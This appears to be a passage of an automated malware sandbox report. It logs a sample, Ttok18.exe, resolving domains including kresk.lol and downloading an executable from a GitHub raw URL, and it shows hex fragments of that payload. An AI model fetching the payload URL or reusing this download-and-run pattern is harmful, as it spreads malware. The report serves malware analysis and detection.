                                                                                                                                                                      Dec 4, 2024 17:05:24.259216070 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.259300947 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.259541035 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.259557009 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.688530922 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.688606977 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.688642025 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.688726902 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:24.688734055 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.688795090 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.689874887 CET49838443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:24.689893961 CET44349838159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.264636040 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.264698029 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.264765978 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.265019894 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.265036106 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.655699968 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.655893087 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.656759024 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.656766891 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.658649921 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.658657074 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:25.658685923 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:25.658691883 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.678344965 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.680958033 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.681463957 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.681474924 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.683352947 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.683358908 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.683392048 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.683398962 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.684977055 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.685056925 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:26.685161114 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.685941935 CET49841443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:26.685959101 CET44349841159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:27.289952993 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.290007114 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:27.290086031 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.290292978 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.290306091 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:27.717155933 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:27.717226982 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.717235088 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:27.717286110 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.718727112 CET49842443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:27.718750954 CET44349842159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.324201107 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.324249029 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.324337006 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.324697971 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.324714899 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.696091890 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.696233988 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.696795940 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.696801901 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.698659897 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.698666096 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:28.698698997 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:28.698707104 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.731261969 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.731345892 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.731812954 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.731820107 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.734010935 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.734016895 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.735976934 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.736057043 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:29.736080885 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.736140966 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.736975908 CET49846443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:29.736989021 CET44349846159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:30.611654997 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:30.611741066 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:30.611758947 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:30.611807108 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:30.612396955 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:30.612443924 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:30.612904072 CET49849443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:30.612914085 CET44349849159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:31.441133022 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:31.441164017 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:31.441272974 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:31.441581011 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:31.441601992 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.847594976 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.847733021 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.848615885 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.848625898 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850505114 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850511074 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850563049 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850574970 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850662947 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850687027 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850791931 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850821018 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850884914 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850889921 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850956917 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850965023 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:32.850974083 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:32.850976944 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:34.562143087 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:34.562223911 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:34.562264919 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.562282085 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.562553883 CET49856443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.562582970 CET44349856159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:34.600805044 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.600837946 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:34.600956917 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.601599932 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:34.601613998 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:36.188711882 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:36.188781023 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:36.189418077 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:36.189426899 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:36.191772938 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:36.191778898 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:37.095632076 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:37.095696926 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:37.095784903 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.095818043 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.096141100 CET49864443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.096149921 CET44349864159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:37.097775936 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.097810030 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:37.097898960 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.098196983 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:37.098212004 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:38.513387918 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:38.513514042 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:38.516359091 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:38.516369104 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:38.518179893 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:38.518191099 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:39.464559078 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:39.464627981 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:05:39.464632988 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:39.464678049 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:39.464910984 CET49871443192.168.2.4159.69.102.165
                                                                                                                                                                      Dec 4, 2024 17:05:39.464925051 CET44349871159.69.102.165192.168.2.4
                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Dec 4, 2024 17:04:17.799207926 CET6251753192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:17.946419954 CET53625171.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:20.526648045 CET5463853192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:20.675065994 CET53546381.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:23.801597118 CET5426753192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:23.942056894 CET53542671.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:25.900907040 CET5636853192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:26.045279026 CET53563681.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:41.658921003 CET5446053192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:41.659158945 CET6084653192.168.2.41.1.1.1
                                                                                                                                                                      Dec 4, 2024 17:04:41.741235971 CET53587401.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:41.807408094 CET53651791.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:41.807974100 CET53544601.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:41.808159113 CET53608461.1.1.1192.168.2.4
                                                                                                                                                                      Dec 4, 2024 17:04:44.808269978 CET53623111.1.1.1192.168.2.4
                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 4, 2024 17:04:17.799207926 CET192.168.2.41.1.1.10x8a0aStandard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:20.526648045 CET192.168.2.41.1.1.10xcd49Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:23.801597118 CET192.168.2.41.1.1.10x760Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:25.900907040 CET192.168.2.41.1.1.10xfeb1Standard query (0)kresk.lolA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:41.658921003 CET192.168.2.41.1.1.10x2d2fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:41.659158945 CET192.168.2.41.1.1.10x8904Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Dec 4, 2024 17:04:17.946419954 CET1.1.1.1192.168.2.40x8a0aNo error (0)github.com20.233.83.145A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:20.675065994 CET1.1.1.1192.168.2.40xcd49No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:20.675065994 CET1.1.1.1192.168.2.40xcd49No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:20.675065994 CET1.1.1.1192.168.2.40xcd49No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:20.675065994 CET1.1.1.1192.168.2.40xcd49No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:23.942056894 CET1.1.1.1192.168.2.40x760No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:26.045279026 CET1.1.1.1192.168.2.40xfeb1No error (0)kresk.lol159.69.102.165A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:41.807974100 CET1.1.1.1192.168.2.40x2d2fNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                                                                                                                      Dec 4, 2024 17:04:41.808159113 CET1.1.1.1192.168.2.40x8904No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                      • github.com
                                                                                                                                                                      • raw.githubusercontent.com
                                                                                                                                                                      • t.me
                                                                                                                                                                      • kresk.lol
                                                                                                                                                                      • www.google.com
                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.44973620.233.83.145443736C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:19 UTC114OUTGET /olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                      Host: github.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-12-04 16:04:20 UTC565INHTTP/1.1 302 Found
                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                      Access-Control-Allow-Origin:
                                                                                                                                                                      Location: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                      2024-12-04 16:04:20 UTC3378INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449737185.199.111.133443736C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:04:21 UTC125OUTGET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1
                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      2024-12-04 16:04:22 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Content-Length: 476160
                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      ETag: "fab0c349a347a91ca7e8afd2bad974668e7a1ce50c0b2f5ed6f73ab561c31a75"
                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                      X-GitHub-Request-Id: C6FC:BBA70:B6819F:C656D5:67507D86
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:04:22 GMT
                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                      X-Served-By: cache-ewr-kewr1740043-EWR
                                                                                                                                                                      X-Cache: MISS
                                                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                                                      X-Timer: S1733328262.164687,VS0,VE15
                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      X-Fastly-Request-ID: e03ffdc9f0139f790f036223f798f6c3d978bfee
                                                                                                                                                                      Expires: Wed, 04 Dec 2024 16:09:22 GMT
                                                                                                                                                                      Source-Age: 0
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 95 8b 4d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a8 04 00 00 98 02 00 00 00 00 00 93 e8 03 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 28 00 00 04 00 00 00 00 00 00 02 00 00 82 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 48 a8 05 00 f0 00 00
                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELMg@(H
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: 44 00 89 e6 0f 11 06 a1 dc c5 45 00 b9 ab 24 eb c5 03 88 85 78 7d d7 6a 01 56 ff d1 8b 46 08 8b 0d e0 c5 45 00 c1 e8 1f ba db f3 54 f1 03 94 81 85 78 7d d7 ff e2 31 c0 40 eb 02 31 c0 83 c4 10 5e c3 56 83 ec 24 a1 e4 c5 45 00 89 e6 56 ff 90 32 6d 22 c7 31 c0 83 7e 14 02 0f 92 c0 8b 0d e8 c5 45 00 ba ba d2 36 9d 03 94 81 32 6d 22 c7 ff e2 a1 ec c5 45 00 6a 00 ff 90 32 6d 22 c7 83 c4 24 5e c3 55 53 57 56 83 ec 20 a1 f0 c5 45 00 be c7 5a 07 33 8b 80 f4 bd 52 92 01 f0 89 e5 6a 01 55 ff d0 31 c0 83 7d 08 00 b9 0c 00 00 00 0f 48 c8 a1 f4 c5 45 00 ba e1 0e 3f 1a 03 94 08 f4 bd 52 92 ff e2 a1 f0 c5 45 00 8b 80 f4 bd 52 92 01 f0 68 00 00 00 40 55 ff d0 bf 04 00 00 00 01 fd a1 f0 c5 45 00 8b 80 f8 bd 52 92 01 f0 8d 5c 24 13 57 55 53 ff d0 8d 04 3b 8b 0d f0 c5 45 00
                                                                                                                                                                      Data Ascii: DE$x}jVFETx}1@1^V$EV2m"1~E62m"Ej2m"$^USWV EZ3RjU1}HE?RERh@UER\$WUS;E
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: a1 30 00 00 00 8b 78 0c 83 c7 14 a1 60 c6 45 00 8b 1f 31 c9 39 fb 0f 94 c1 bd 88 db 1e b6 8b 8c 88 eb da ea 57 01 e9 31 c0 ff e1 b8 cb 3b 16 40 03 05 98 c2 45 00 56 ff 73 28 ff d0 8b 0d 60 c6 45 00 8d 51 0c 85 c0 0f 45 d1 8b 92 e7 da ea 57 01 ea b0 01 ff e2 8b 1b 31 c0 39 fb 0f 94 c0 ba 88 db 1e b6 03 94 81 eb da ea 57 31 c0 ff e2 5e 5f 5b 5d c2 04 00 57 56 a1 70 c6 45 00 be a5 46 08 98 8b 80 5f ce 0e 41 01 f0 68 4c a6 45 00 ff d0 84 c0 b8 4c 00 00 00 b9 38 00 00 00 0f 45 c8 a1 78 c6 45 00 bf 95 53 56 c9 8b 84 08 5f ce 0e 41 01 f8 ff e0 a1 70 c6 45 00 03 b0 5f ce 0e 41 68 f6 a6 45 00 ff d6 34 01 0f b6 c0 c1 e0 05 8b 0d 78 c6 45 00 03 bc 01 63 ce 0e 41 ff e7 a1 70 c6 45 00 be a5 46 08 98 8b 80 5f ce 0e 41 01 f0 68 7e a6 45 00 ff d0 84 c0 b8 10 00 00 00 b9
                                                                                                                                                                      Data Ascii: 0x`E19W1;@EVs(`EQEW19W1^_[]WVpEF_AhLEL8ExESV_ApE_AhE4xEcApEF_Ah~E
                                                                                                                                                                      2024-12-04 16:04:22 UTC1378INData Raw: ba ff ff 0f 00 52 6a 08 50 ff d1 89 7c 24 10 89 c7 a1 04 c3 45 00 01 e8 53 ff d0 83 c4 04 8b 0d 08 c3 45 00 01 e9 50 ff d1 83 c4 04 a1 0c c3 45 00 01 e8 ff d0 89 c1 ba 81 80 80 80 f7 ea 01 ca 89 d0 c1 e8 1f c1 fa 07 01 c2 89 d0 c1 e0 08 29 c2 01 ca b8 ff ff 0f 00 50 52 57 e8 8a 98 04 00 83 c4 0c 03 2d 10 c3 45 00 8d 44 24 08 53 50 b8 ff ff 0f 00 50 89 7c 24 0c 57 8b 7c 24 20 57 ff d5 31 c9 85 c0 0f 94 c1 c1 e1 04 a1 b8 c6 45 00 03 b4 08 51 77 23 00 ff e6 8d 48 3c 83 c0 30 81 7c 24 08 ff ff 0f 00 0f 45 c1 bd 3c e6 e1 fd 8b 80 29 77 23 00 01 e8 31 db ff e0 68 ff ff 0f 00 53 ff 74 24 08 e8 20 98 04 00 83 c4 0c 89 f9 bf b6 9d 66 6c a1 14 c3 45 00 01 f8 51 ff d0 a1 f8 c2 45 00 01 f8 83 ec 1c 89 5c 24 18 0f 28 05 50 c8 44 00 0f 11 44 24 04 8d 4c 24 30 89 0c 24
                                                                                                                                                                      Data Ascii: RjP|$ESEPE)PRW-ED$SPP|$W|$ W1EQw#H<0|$E<)w#1hSt$ flEQE\$(PDD$L$0$
